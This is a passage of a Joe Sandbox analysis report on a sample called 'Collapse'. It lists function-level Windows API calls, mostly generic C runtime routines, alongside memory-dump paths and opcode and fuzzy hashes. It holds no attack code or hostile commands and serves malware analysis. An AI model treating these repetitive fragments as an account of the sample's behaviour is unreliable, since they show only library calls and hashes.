                                                                                                        • Opcode Fuzzy Hash: d9d62a96dc4bd0b66bf885da68b09de0552910a9b6002276b405ba0b61ee9706
                                                                                                        • Instruction Fuzzy Hash: B6D06C3A655A58AFC210CF8AE840D41F7A8FB8D670B158166EA1893B20C271F811CEE0
                                                                                                        APIs
                                                                                                        • GetCPInfo.KERNEL32(00D14580,00D14580,00000000,7FFFFFFF,?,009AA19D,00D14580,00D14580,00000000,00D14580,?,?,?,?,00D14580,00000000), ref: 009AA258
                                                                                                        • __alloca_probe_16.LIBCMT ref: 009AA313
                                                                                                        • __alloca_probe_16.LIBCMT ref: 009AA3A2
                                                                                                        • __freea.LIBCMT ref: 009AA3ED
                                                                                                        • __freea.LIBCMT ref: 009AA3F3
                                                                                                        • __freea.LIBCMT ref: 009AA429
                                                                                                        • __freea.LIBCMT ref: 009AA42F
                                                                                                        • __freea.LIBCMT ref: 009AA43F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __freea$__alloca_probe_16$Info
                                                                                                        • String ID:
                                                                                                        • API String ID: 127012223-0
                                                                                                        • Opcode ID: 2bc59ed27dd83a15f63dd5908cf9fe90c9f0e2097c85cd631a1046f5953452fa
                                                                                                        • Instruction ID: 8cf9055788fdb9f9d2bed80bae3a6f7e351f817512a1dad43468eba4cdb4542f
                                                                                                        • Opcode Fuzzy Hash: 2bc59ed27dd83a15f63dd5908cf9fe90c9f0e2097c85cd631a1046f5953452fa
                                                                                                        • Instruction Fuzzy Hash: 8771E5729002459BDF219F648C81BAE77EEEF8B710F250459FD14A7291EB7A9C40C7E2
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _strrchr
                                                                                                        • String ID:
                                                                                                        • API String ID: 3213747228-0
                                                                                                        • Opcode ID: cbff355201e6154b52781c3113966492e3c4af968235757aaf5a3f6f2afe1b0b
                                                                                                        • Instruction ID: 81ef36e20875f5403fa0f7070a2c98e810a27488b0afc8a6282566bf31dad5ca
                                                                                                        • Opcode Fuzzy Hash: cbff355201e6154b52781c3113966492e3c4af968235757aaf5a3f6f2afe1b0b
                                                                                                        • Instruction Fuzzy Hash: 64B15A72A063559FEF11CFACCCC2BBEBBA9EFA5350F144555E405AF282D2749901C7A0
                                                                                                        APIs
                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 0098F827
                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0098F82F
                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 0098F8B8
                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 0098F8E3
                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 0098F938
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                        • String ID: csm
                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                        • Opcode ID: b87a7a26404e4590646a804775b59af0630623474e202f1d67895e39c7f3f7d0
                                                                                                        • Instruction ID: e25478954a0a9c72850df9f1c6f8c689f4f09d8323a23c5e162c1c3a3d0a08c8
                                                                                                        • Opcode Fuzzy Hash: b87a7a26404e4590646a804775b59af0630623474e202f1d67895e39c7f3f7d0
                                                                                                        • Instruction Fuzzy Hash: B941E731E00218ABCF10EF68C894B9E7BB5EF85324F148165E815AB392D735DE15CBD1
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0098EB22
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 0098EB30
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 0098EB41
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                        • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                        • API String ID: 667068680-1047828073
                                                                                                        • Opcode ID: cc01cb2807f8ca4750c4430e87a260093e93099c25ede77a43225ca059908ae4
                                                                                                        • Instruction ID: a372d591b16d7acf07398ca0ac43e76616d7eed101e2be2328d3500459b3719f
                                                                                                        • Opcode Fuzzy Hash: cc01cb2807f8ca4750c4430e87a260093e93099c25ede77a43225ca059908ae4
                                                                                                        • Instruction Fuzzy Hash: C7D09E355AD3206F8700ABB0BE4A8D67E94EF856393054755F501D2561D7B44940AB94
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 51218f6e9be0a39dc31ab5450d79aa61a63bf8e9fe3497a0660b34736b886493
                                                                                                        • Instruction ID: 111531af8752034f70e11d5942893829c646e9e041673dcc04e9852440ccd37e
                                                                                                        • Opcode Fuzzy Hash: 51218f6e9be0a39dc31ab5450d79aa61a63bf8e9fe3497a0660b34736b886493
                                                                                                        • Instruction Fuzzy Hash: 7CB1D5B0A08249AFDF15EFA8C841BAF7BB5FF96310F144158E404A72D2DB759941CBE0
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(?,?,00999AEB,0098F5BA,0098E585), ref: 00999B02
                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00999B10
                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00999B29
                                                                                                        • SetLastError.KERNEL32(00000000,00999AEB,0098F5BA,0098E585), ref: 00999B7B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                        • String ID:
                                                                                                        • API String ID: 3852720340-0
                                                                                                        • Opcode ID: aac2deec67e791e923f27c264f436aa0428e4947acbc09ad64a2fa77b750dae8
                                                                                                        • Instruction ID: 65b578025da502ab14654a3f549d28d92a0ce4e6e4376b5091281cab77f8d9ab
                                                                                                        • Opcode Fuzzy Hash: aac2deec67e791e923f27c264f436aa0428e4947acbc09ad64a2fa77b750dae8
                                                                                                        • Instruction Fuzzy Hash: C401D83222DA116EAE242FFCBD86B1B2A5CEB56775721032EF521755F2EE195C00B190
                                                                                                        APIs
                                                                                                        • type_info::operator==.LIBVCRUNTIME ref: 0099A4DB
                                                                                                        • CallUnexpected.LIBVCRUNTIME ref: 0099A754
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CallUnexpectedtype_info::operator==
                                                                                                        • String ID: csm$csm$csm
                                                                                                        • API String ID: 2673424686-393685449
                                                                                                        • Opcode ID: 10fb7cc30390334e0228d577f25a33e787b7fc85227cf759b9fbefa94c667e1c
                                                                                                        • Instruction ID: 6027dc37abb9893c490cb3dac553a0d8d3b1f0b65c7e852bf4e68132ef6b5d5e
                                                                                                        • Opcode Fuzzy Hash: 10fb7cc30390334e0228d577f25a33e787b7fc85227cf759b9fbefa94c667e1c
                                                                                                        • Instruction Fuzzy Hash: A5B18671800209EFCF14DFADC885AAEBBB9FF54310F18456AE8056B222D735DA51CBD2
                                                                                                        APIs
                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,F1D6E486,?,?,00000000,009AB3E5,000000FF,?,00994B4A,00000002,?,00994BE6,00997849), ref: 00994ABE
                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00994AD0
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,009AB3E5,000000FF,?,00994B4A,00000002,?,00994BE6,00997849), ref: 00994AF2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                        • Opcode ID: 8e53789be631367d772b0ce1088f3c325d6efd68736868c6b740339f047b596a
                                                                                                        • Instruction ID: a8b44951823fadd13a04fd14b341a8dc38c8c67dcb4ea44a36a0825987f897ec
                                                                                                        • Opcode Fuzzy Hash: 8e53789be631367d772b0ce1088f3c325d6efd68736868c6b740339f047b596a
                                                                                                        • Instruction Fuzzy Hash: 5B01A735998615AFCB129F84DD05FAF7BFCFB44B25F000629F821A2690DB749900DA94
                                                                                                        APIs
                                                                                                        • __alloca_probe_16.LIBCMT ref: 0099C59B
                                                                                                        • __alloca_probe_16.LIBCMT ref: 0099C664
                                                                                                        • __freea.LIBCMT ref: 0099C6CB
                                                                                                          • Part of subcall function 0099AD61: RtlAllocateHeap.NTDLL(00000000,0099CD3A,?,?,0099CD3A,00000220,?,00000000,?), ref: 0099AD93
                                                                                                        • __freea.LIBCMT ref: 0099C6DE
                                                                                                        • __freea.LIBCMT ref: 0099C6EB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1423051803-0
                                                                                                        • Opcode ID: 8406579dd5b8f73b6ad039323dcf21fc60b861397938038375b02f68e43258a2
                                                                                                        • Instruction ID: f6951f076a2eead8a6e3b9ee65bd5e9b77cb2c79d7d888a989944c0ae8b87a9c
                                                                                                        • Opcode Fuzzy Hash: 8406579dd5b8f73b6ad039323dcf21fc60b861397938038375b02f68e43258a2
                                                                                                        • Instruction Fuzzy Hash: 8251AFB2600247AFEF21AF68DC81EBB7AADEF98710B15052AFC05D7151EB75DD108660
                                                                                                        APIs
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0098E8FB
                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?,?,00000000,009AB3C8,000000FF,?,0098B697), ref: 0098E91A
                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,009AB3C8,000000FF,?,0098B697), ref: 0098E948
                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,009AB3C8,000000FF,?,0098B697), ref: 0098E9A3
                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,009AB3C8,000000FF,?,0098B697), ref: 0098E9BA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 66001078-0
                                                                                                        • Opcode ID: c53cb613bee49843f556cdf52e5dd9155c8c3c210b2d870a16d471904f2e65af
                                                                                                        • Instruction ID: d454df10600a9ba5605f85dd8bb158d7fd970158a5afcf5526bf0047c6d5363b
                                                                                                        • Opcode Fuzzy Hash: c53cb613bee49843f556cdf52e5dd9155c8c3c210b2d870a16d471904f2e65af
                                                                                                        • Instruction Fuzzy Hash: 97416B31504606DFCB64EF65C5A5A6AB3F8FF08360B204A2AE456D7740E7B2F984CB51
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 0098C05B
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0098C066
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0098C0D4
                                                                                                          • Part of subcall function 0098BF5D: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0098BF75
                                                                                                        • std::locale::_Setgloballocale.LIBCPMT ref: 0098C081
                                                                                                        • _Yarn.LIBCPMT ref: 0098C097
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                        • String ID:
                                                                                                        • API String ID: 1088826258-0
                                                                                                        • Opcode ID: 3156da1573939fa9d5283d58178ecf28b46f57b2a989d260ff91191e59377121
                                                                                                        • Instruction ID: 3dfaab01e6112c17cb12dd9c3865c01c2dec6459072f08190ac283027d10f1a2
                                                                                                        • Opcode Fuzzy Hash: 3156da1573939fa9d5283d58178ecf28b46f57b2a989d260ff91191e59377121
                                                                                                        • Instruction Fuzzy Hash: 4E019AB5A04510DBCB06FB20895567D7BA1BBC5760B190248E816573C2CF34AA42DBD1
                                                                                                        APIs
                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,009A535D,00000000,?,009B8180,?,?,?,009A5294,00000004,InitializeCriticalSectionEx,009AF434,009AF43C), ref: 009A52CE
                                                                                                        • GetLastError.KERNEL32(?,009A535D,00000000,?,009B8180,?,?,?,009A5294,00000004,InitializeCriticalSectionEx,009AF434,009AF43C,00000000,?,0099AA0C), ref: 009A52D8
                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 009A5300
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                        • String ID: api-ms-
                                                                                                        • API String ID: 3177248105-2084034818
                                                                                                        • Opcode ID: 95c08a5a8a4ae53471fde5aacabd4840b154ab056a2e6fc1ae26fd815678e37f
                                                                                                        • Instruction ID: b631dec8986c25a5ffdc2f3b700d4363554bf8e6ae6755e9cbc717c1573e30fe
                                                                                                        • Opcode Fuzzy Hash: 95c08a5a8a4ae53471fde5aacabd4840b154ab056a2e6fc1ae26fd815678e37f
                                                                                                        • Instruction Fuzzy Hash: FBE04F303C4305F7EF201B61EE06B5D3E59AB51FA5F104030FA0DE84E2DBE1E810A584
                                                                                                        APIs
                                                                                                        • GetConsoleOutputCP.KERNEL32(F1D6E486,00000000,00000000,?), ref: 009A3122
                                                                                                          • Part of subcall function 0099AE71: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0099C6C1,?,00000000,-00000008), ref: 0099AED2
                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 009A3374
                                                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 009A33BA
                                                                                                        • GetLastError.KERNEL32 ref: 009A345D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                        • String ID:
                                                                                                        • API String ID: 2112829910-0
                                                                                                        • Opcode ID: 6f558125fbba98e38a65ad5f5f2e85a393a38e5aebd3abfac67bf3e93e08771e
                                                                                                        • Instruction ID: b50437223bafdd3906330003218e29de17960fd73ef84d79f9143cc1f02fb48a
                                                                                                        • Opcode Fuzzy Hash: 6f558125fbba98e38a65ad5f5f2e85a393a38e5aebd3abfac67bf3e93e08771e
                                                                                                        • Instruction Fuzzy Hash: 7ED15C75D082499FCF15CFE8D880AADBBF9FF4A310F14856AE425EB251D730AA41CB90
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AdjustPointer
                                                                                                        • String ID:
                                                                                                        • API String ID: 1740715915-0
                                                                                                        • Opcode ID: 1bb843e0c5c349095c0d297e2b77ef7eba8f5d6980bb06cb54b3dd45f193cb6b
                                                                                                        • Instruction ID: 84c92c5003560df337c16edc5c5aae87f00e92397e72f5e207ac6ad32c0bc5ca
                                                                                                        • Opcode Fuzzy Hash: 1bb843e0c5c349095c0d297e2b77ef7eba8f5d6980bb06cb54b3dd45f193cb6b
                                                                                                        • Instruction Fuzzy Hash: 9E51D1726042069FDF259F58D845B7A77A8FF54710F14452DE826472A1E732ED80CBD2
                                                                                                        APIs
                                                                                                          • Part of subcall function 0099AE71: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0099C6C1,?,00000000,-00000008), ref: 0099AED2
                                                                                                        • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 009A0BEA
                                                                                                        • __dosmaperr.LIBCMT ref: 009A0BF1
                                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 009A0C2B
                                                                                                        • __dosmaperr.LIBCMT ref: 009A0C32
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
